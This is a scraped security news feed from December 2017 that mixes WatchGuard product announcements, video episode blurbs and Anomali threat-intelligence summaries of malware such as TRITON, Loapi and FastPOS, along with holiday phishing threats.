Customer Support Access Changes

As a loyal WatchGuard customer, I’m sure that you’re aware that WatchGuard is growing!  To address your future needs, WatchGuard Customer Support is changing the way our technicians connect to your WatchGuard appliance while working on a support case.

New Option to Enable Support Access

Over the years, you have used a list of IP addresses in a WatchGuard policy to grant our technicians access to a Firebox or XTM appliance to troubleshoot issues.  For added security and ease of granting WatchGuard Support access, we have added an additional Support Access feature to Fireware v12.0.1 

The Support Access option enables WatchGuard Support to connect to your Firebox with read-only permission. It adds a temporary user account with read-only permission and a temporary hidden policy that allows connections to the Firebox from You can automatically generate credentials or specify a user name and password to provide to your WatchGuard support representative.

You can also define an expiration for the temporary Support Access account.  Options for support access account expiration include:

  • None (no expiration)
  • 3 months
  • 1 month
  • 1 week
  • 1 day


New Connection IP Network Address

Appliances that run Fireware v12.0 or earlier will continue to use the WatchGuard policy configuration process, which involves adding specific IP addresses and ranges to the WatchGuard policy.  WatchGuard Support is migrating to a new public subnet as part of an IT infrastructure change. For instructions on updating or setting up your WatchGuard policy configuration please see the knowledge base article #10426:  Allow WatchGuard Support to connect to your Firebox.

As you migrate to Fireware v12.0.1 and higher software versions, please begin using the more secure and easy-to-use Support Access process to provide read-only access to your Firebox when working on support cases. For more detailed information on the Support Access feature, please see the online documentation.

Wishing all our loyal WatchGuard customers a wonderful holiday season.

Source: WatchGuard

Triton Malware Threatens Lives & The Net Neutrality Repeal – A History – Threat Wire

A history of ISP regulations, new malware is infecting industrial control systems, and three men plead guilty in the Mirai botnet case. All that coming up now on ThreatWire.

Our Site:
Contact Us:
Threat Wire RSS:
Threat Wire iTunes:
Help us with Translations!

Net Neutrality Is Canned



Youtube Thumbnail credit:

Source: Security news

Source: Zologic

Comprehensive Endpoint Protection Requires the Right Cyber Threat Intelligence

CTI falls into three main categories — tactical, operational, and strategic — and answers questions related to the “who, what, and why” of a cyber attack.
Source: Cyber Monitoring

WTB: New GnatSpy Mobile Malware Family Discovered

This section listed below contains summaries on various threat intelligence stories that occurred during the past week. The intelligence in this week’s iteration discuss the following threats: ATM-theft, Data leak, Malspam, Mobile malware, Phishing, Targeted attacks, Threat group, underground markets, and Vulnerabilities. The IOCs related to these stories are attached to the WTB and can be used to check your logs for potential malicious activity.

Trending Threats

Jack of All Trades (December 18, 2017)
A new mobile malware is targeting Android devices, according to Kaspersky Lab researchers. The malware, called “Loapi,” is being called a “jack of all trades” malware because of the numerous malicious capabilities that have been observed. The modular architecture of the malware allows it to perform different malicious actions such as advertisements, Distributed Denial-of-Service (DDoS) attacks, mine cryptocurrency, send SMS messages, and subscribe to paid services, among others. Researchers note that the modular architecture could allow the actors behind the malware to add new features at any time. The malware was observed to impersonate antivirus and adult-related applications.
Click here for Anomali Recommendation

New GnatSpy Mobile Malware Family Discovered (December 18, 2017)
In early 2017, researchers discovered that a threat group, dubbed “Two-tailed Scorpion/APT-C-23,” was targeting Middle Eastern organizations with the “Vamp” and later on “FrozenCell” malware. Now Trend Micro researchers have discovered a new mobile malware family, dubbed “GnatSpy,” that is believed to be a new variant of “Vamp.” As of this writing, researchers do not know how the threat group is distributing the malware to Android devices. However, it is possible that the actors sent them directly to said devices; researchers note the distribution method is in question because few Android applications were found to contain GnatSpy. The complexity of GnatSpy indicated that the group is increasing their malicious engineering efforts to steal information from Android devices.
Click here for Anomali Recommendation

Microsoft Disables DDE Feature in Word to Prevent Further Malware Attacks (December 15, 2017)
Microsoft has released an Office update that disables the Dynamic Data Exchange (DDE) protocol in Word applications as part of December’s Patch Tuesday. The DDE feature allows an Office application to load data from other applications. DDE has been used by threat actors to distribute malware, and this update is Microsoft’s attempt to help mitigate such malicious activity.
Click here for Anomali Recommendation

Ngay Campaign Rig EK Pushes Quant Loader & Monero CPU Miner (December 14, 2017)
Nao-sec researchers discovered a drive-by download attack campaign, dubbed “ngay,” that appears to be targeting Vietnamese-speaking individuals. The actors behind this campaign previously used drive-by download attacks to redirect website visitors to the “Disdain” Exploit Kit (EK). Researcher identified that this campaign is now using the “RIG” EK to distribute the “Quant” loader malware and a “Monero” cryptocurrency miner.
Click here for Anomali Recommendation

Attackers Deploy New ICS Attack Framework “TRITON” and Cause Operational Disruption to Critical Infrastructure (December 14, 2017)
While responding to a security incident, FireEye Mandiant researchers discovered that an unnamed company was infected with an attack framework malware called “TRITON.” The malware is designed to interact with Triconex Safety Instrumented System (SIS) controllers. Researchers state that TRITON is one of the publicly identified malwares that target Industrial Control Systems (ICS) and is consistent with the “Stuxnet” and “Industroyer” malware. The malware was found on a SIS workstation that ran the Microsoft Windows operating system while impersonating the authentic Triconex Trilog application.
Click here for Anomali Recommendation

Apple Releases Security Updates (December 13, 2017)
The U.S. Computer Emergency Readiness Team (US-CERT) has issued an alert regarding vulnerabilities located in multiple Apple products. The vulnerabilities could be exploited by a remote threat actor to alter the application state iOS and tvOS. Apple’s iCloud for Windows 7.2 is vulnerable to an actor on a privileged network position tracking a user on the same network.
Click here for Anomali Recommendation

WORK Cryptomix Ransomware Variant Released (December 13, 2017)
A new variant of the “Cryptomix” ransomware, dubbed “WORK” because of the .WORK extension appending of the malware, has been discovered in the wild, according to BleepingComputer researchers. This new variant uses the same encryption methods as previous Cryptomix versions, with the change coming in the form of .WORK appended to encrypted files and new emails to contact for the decryption key. While the distribution method of this ransomware has not been reported, malspam is often a common method to distribute malware.
Click here for Anomali Recommendation

The ROBOT Attack (December 12, 2017)
A vulnerability first identified in 1998 by researcher Daniel Bleichenbacher, dubbed “Return Of Bleichenbacher’s Oracle Threat (ROBOT), has resurfaced, according to researchers Hanno Böck and Craig Young. Other researchers believe that this vulnerability is in fact the original “Padding Oracle Attack.” Daniel Bleichenbacher discovered that “the error messages given by SSL server for errors in the PKCS #1 1.5 padding allowed an adaptive-chosen ciphertext attack; this attack fully breaks the confidentiality of TLS when used with RSA encryption.” This vulnerability could allow a threat actor to record Internet traffic and later decrypt it against a vulnerable host that only supports RSA encryption. Researchers found that 27 of the top 100 domains, ranked by Alexa, had vulnerable subdomains.
Click here for Anomali Recommendation

Database of 1.4 Billion Credentials Found on Dark Web (December 11, 2017)
4iQ researchers have discovered a large, interactive database that contains an aggregated list of compromised credentials from approximately 252 previous breaches. The discovery was made on December 5, 2017. The total amount of advertised data consists of usernames and associated, clear text passwords is 1,400,533,869. The structure of the database makes it simply for anyone to download and interact with it, and the search feature is fast enough to return a result in one second. After additional analysis on the data, researchers found that the number of compromised credentials is less because not all of the usernames are listed with an associated password. While some sources state that the data was located on underground forums, and this is likely, the data was also found on open source locations such as “Reddit.”
Click here for Anomali Recommendation

Hacker’s Delight: Mobile Bank App Security Flaw Could Have Smacked Millions (December 11, 2017)
University of Birmingham researchers have published information regarding vulnerabilities located in popular banking applications. The researchers used a custom tool called “Spinner” to conduct semi-automated security tests on 400 applications that heavily rely on security. Through this testing, it was discovered that many banking applications use a technique called “Certificate Pinning” to improve connection security, but use of this technique made it more difficult for penetration testers to find a more serious vulnerability. Researchers found that the vulnerability located in many popular banking applications was that they did not have a proper hostname verification. This flaw could have allowed a threat actor, on the same network of an individual using an affected application, to conduct Man-in-The-Middle (MiTM) attacks to steal user credentials.
Click here for Anomali Recommendation

Phishing Attacks on Bitcoin Wallets Intensify as Price Goes Higher and Higher (December 11, 2017)
With the significant increase in monetary value of the Bitcoin currency, approximately $16,180 USD per bitcoin as of this writing, threat actors are increasing their targeting Bitcoin-related websites and Bitcoin users. In addition to phishing emails, “CheckPhish” researchers also identified five phishing domains targeting the “Blockchain” wallet service. Other security researchers found that the Bitcoin exchange “LocalBitcoins” brand was also used in phishing websites. Threat actors are attempting to steal wallet files and empty accounts of their bitcoins.
Click here for Anomali Recommendation

Hackers Hit U.S., Russian Banks In ATM Robbery Scam: Report (December 11, 2017)
A previously unknown, Russian-speaking threat group, dubbed “MoneyTaker,” is responsible for the theft of approximately $10 million USD from around 18 banks, according to Group-IB researchers. The actors targeted ATMs operated by banks primarily located in the U.S. and Russia. The malicious activity is ongoing and is believed to have begun approximately 18 months ago. Researchers identified that the first attacks took place in the spring of 2016 against banks using the payment technology company “First Data’s” “STAR” network; STAR is a debit card processing and payment network. First Data has stated that “a number” of financial institutions on the STAR network had their credentials for administering debit cards compromised. The actors used custom malware called MoneyTaker, also used for the name of the group, to manipulate payment orders and then use “money mules” to cash out funds from ATMs
Click here for Anomali Recommendation

Observed Threats

This section includes the top threats observed from the Anomali Community user base as well as sensors deployed by Anomali Labs. A ThreatStream account is required to view this section. Click here to request a trial.

Locky Tool Tip
Locky is ransomware that is widely spread via phishing messages. Locky first appeared in early 2016. Locky is strongly correlated with the cyber criminal groups related to the dridex and necurs botnets. Multiple waves of Locky samples are distributed daily. The delivery mechanism has evolved over time. The delivery mechanism has been spam messages with executable attachments, MS Word document attachments using Macros to retrieve then execute Locky, and Zip files that extract JavaScript loaders that retrieve then execute Locky. Hosts compromised by Locky display a ransom-note with instructions on how to decrypt the encrypted files. Encrypted files are renamed .locky or .zepto.
Tags: Locky, Ransomware

Source: Honeypot Tech

Fireware 12.1 Now Available

We are pleased to announce the new release of Fireware 12.1 and WSM 12.1! These significant new releases are now available for download from the software download center. The highlight of Fireware 12.1 is the Access Portal, a clientless application portal that is available for SSO integration for cloud assets and internal resources via RDP and SSH. With the rate and notoriety of recent cybersecurity incidents involving compromised personal information, the marketplace for web-based authentication solutions continues to grow at a Compound Annual Growth Rate upwards of 10%.1 The Access Portal is uniquely positioned to integrate into existing authentication markets to provide a clientless experience while encouraging strong authentication with existing SSO vendors or even providing MFA access (i.e. Google Authenticator, etc.) to the portal itself.

The release of Fireware 12.1 adds a bevy of networking, VPN and proxy improvements that allow the network administrator to focus on the network without compromising security:

  • BoVPN over TLS provides an alternative to IPSec for site to site VPNs;
  • Mobile VPN w/ IKEv2 enables support for native VPNs on mobile operating systems including Mac, Windows, iOS, and Android
  • USB modem interface enabled to deliver physical interface features such as Multi-WAN enablement, traffic management
  • New IMAPS proxy, HTTPS domain software exclusion list, and WebBlocker UI improvements
  • Gateway Wireless Controller developed with band steering capability and additional passphrase protections


Does this release pertain to me?

The Fireware release applies to all Firebox T, Firebox M, and XTM appliances, except XTM 21/21-W, 22/22-W, or 23/23-W, XTM 505, 510, 520, and 530 which have reached the End of Life.

Software Download Center

Firebox and XTM appliance owners with active support subscriptions can obtain this update without additional charge by downloading the applicable packages from the WatchGuard Software Download Center.


For Sales or Support questions, you can find phone numbers for your region online. If you contact WatchGuard Technical Support, please have your registered appliance Serial Number or Partner ID available.



Source: WatchGuard

Advanced Deception: How It Works & Why Attackers Hate It

While cyberattacks continue to grow, deception-based technology is providing accurate and scalable detection and response to in-network threats.
Source: Vulnerabilitys & Threats

Hak5 2314 – Hacking PIN Codes with a 3D Printer

In this very serious episode of Hak5, we learn how to hack PIN codes with a 3D printer by editing code for the 3D printer axis!

Special thanks to David Randolph for joining us on this episode! –

Our Site:
Contact Us:
Threat Wire RSS:
Threat Wire iTunes:
Help us with Translations!

Source: Security news

Source: Zologic

[Strategic Security Report] Navigating the Threat Intelligence Maze

Most enterprises are using threat intel services, but many are still figuring out how to use the data they’re collecting. In this Dark Reading survey we give you a look at what they’re doing today – and where they hope to go.
Source: Cyber Monitoring

TekThing 155 – Tech Gifts for Travelers! Amazon Cloud Cam Review, Test Your Home Network Speed!

Tech Gifts for Travelers! Amazon Cloud Cam Review, Test Your Home Network Speed, $10,000 Surge Protector Save!
03:26 Amazon Cloud Cam
When Canary Security Cameras dropped several of the features that came in the free plan, and paywalled the built in mic for two way talk, Shannon started the search for an alternative security cam. How does Amazon’s Cloud Cam stack up vs. Canary, Arlo, and Nest? Watch the video for the review! (If you want to know what dauth attacks are, read this.)

14:50 Network Performance Testing
How fast is your router? How slow is the WiFI in that corner of the house? John tweeted out, “in episode 146 you talked about network speed tests (not internet). What software do you use for this?” We talk about iPerf, which has clients for just about everything, and an easy to run Windows version, Network Performance Test, in the video!

19:36 Patreon Not Changing Fees
“We messed up. We’re sorry, and we’re not rolling out the fees change.” Good to hear, but we’ve got a hack so you can create a monthly payment, ideas for alternatives, and our thanks for your support during this mess in the show.

We messed up. We’re sorry, and we’re not rolling out the fees change.

22:03 Tech Gifts For Frequent Travelers!!!
After her last trip to Japan, Shannon’s got a fresh group of tech gifts for world travlelers (and US travelers for that matter! What’s going on the list alongside the HooToo Wireless Router and Anker 5 port USB wall charger??? A 20100 mAh battery pack, there’s a USB C pick, too, and here’s the FAA Regulations on Batteries, noise cancelling headphones (Bose and 1More have great options.), a mini-digital scale from TipTiper, a VPN service (we use PIA), Peak Design’s Everyday Backpack, and more, in the video!

30:11 Surge Protectors Saved Mark’s Tech
The TV in the bedroom was literally smoking… all the other TVs and the computers in Mark’s house were safe. Find out what happened, and why you really should be running surge protectors on your gear in the video!

33:13 Do Something Analog
Like Ken, who sent us a great photo from his tech break at Myrtle Beach!
Thank You Patrons! Without your support via, we wouldn’t be able to make the show for you every week!
Amazon Associates:
Dale Chase Music:

Source: Security news

Source: Zologic

A Very Malicious Christmas

In 2017, Americans are projected to spend $906 million on gifts, up from $785 in 2016. A significant chunk of that total will be spent online. As consumers turn to the internet, those looking to exploit them are increasing at a similar rate.

Over the last 5 years, the festive season has seen actors ramping up Christmas themed campaigns to directly target businesses and consumers. This post outlines a very small number of particularly prolific attacks that have been observed over previous Christmases that will very likely be seen in reworked variants this year.


View details in ThreatStream:*fastpos.*

Despite the increase in ecommerce transactions, in-person retail sales still account for the largest share of the market. Many consumers don’t think twice when they swipe their credit card or enter their PIN when buying that must-have gift. Unfortunately, some of these people might receive unwelcome expenses on their credit card statements come January if they’ve fallen victim to using a point-of-sale (POS) device infected with malware.

First seen in June 2016, FastPOS is just one piece of malware that targets POS devices. FastPOS, as it is called, is much like other POS families in that it will capture credit data, Track2 and log keystrokes on the infected machine. Notably, the malware communicates with its command and control (C&C) via unencrypted HTTP session. The POS malware establishes persistence much like other malware by creating an auto run key in the Windows registry.

Previously, FastPOS has taken advantage of the increased retail transaction volume in the run-up to Christmas. Various iterations of the FastPOS and other malware families targeting POS systems are likely to follow suit during the 2017 holiday season.

Protip for retailers: search for indicators of compromise (IOCs) tagged with “retail” in ThreatStream to uncover threats to your operations over Christmas.

Lizard Squad

View details in ThreatStream:*lizard%20squad.*

In 2014, Lizard Squad performed a distributed denial-of-service (DDoS) attack against the Xbox Live and Sony Playstation networks over Christmas. As millions (including myself) attempted to play the games they’d just received as gifts they were met with errors. This occurred for the duration of the attack. 

Looking through ThreatStream, Lizard Squad are responsible for a number of attacks, with DDoS being their preferred method. Since the group’s inception they have developed increasingly more sophisticated DDoS capabilities and are now using variations of the botnet malware GafGyt.

Protip for gaming companies: sync indicators of compromise (IOCs) from ThreatStream with your SIEM to automatically match known threats to your logs, and alert when a match has been found.

Merry X-Mas

View details in ThreatStream:*Merry%20Christmas%20Ransomware.*

2017 has been the year of ransomware. From Wanacry to Petya and everything else in between, ransomware has brought havoc to companies around the world. The NotPetya ransomware will reportedly cost shipping giant, Maersk, $300 million alone!

The Merry Christmas (or Merry X-Mas) ransomware was spotted for the first time by security researchers in early January 2017, when the malware was distributed through spam campaigns. According to researchers, the latest strains of the ransomware have been delivered together with other pieces of malware, namely DiamondFox, which is used to steal sensitive information from victims’ systems.

Protip for SecOps teams: be immediately alerted when the latest malware hashes or suspect domain generated algorithms are seen inside your network (including on mobile devices) using Anomali Enterprise.

Phishing for gifts

View search in ThreatStream*christmas.*

A quick search for malicious domains in ThreatStream turns up hundreds of IOCs with the word “christmas.” Phishing campaigns often ramp up over the festive period, taking advantage of the fact people are spending more money in December. I’ve seen campaigns spoofing retailers and financial institutions in greater number this year than in any previous year I can recall.

Protip for everyone: never click a link in an email. For SecOps teams, monitor emails from compromised addresses or with links to known malicious domains before they’re clicked using Anomali Enterprise.

A few free Christmas gifts from Anomali

STAXX gives you an easy way to access any STIX/TAXII feed and is a great tool for those starting to incorporate threat intelligence into their security strategies. 

You can download STAXX for free here — our gift to you this Christmas.

Understand your security risk posture with a free customized Recon Report from Anomali Labs. Simply sign up for a free Anomali Enterprise Trial in the month of December.

A December to Remember

Source: Honeypot Tech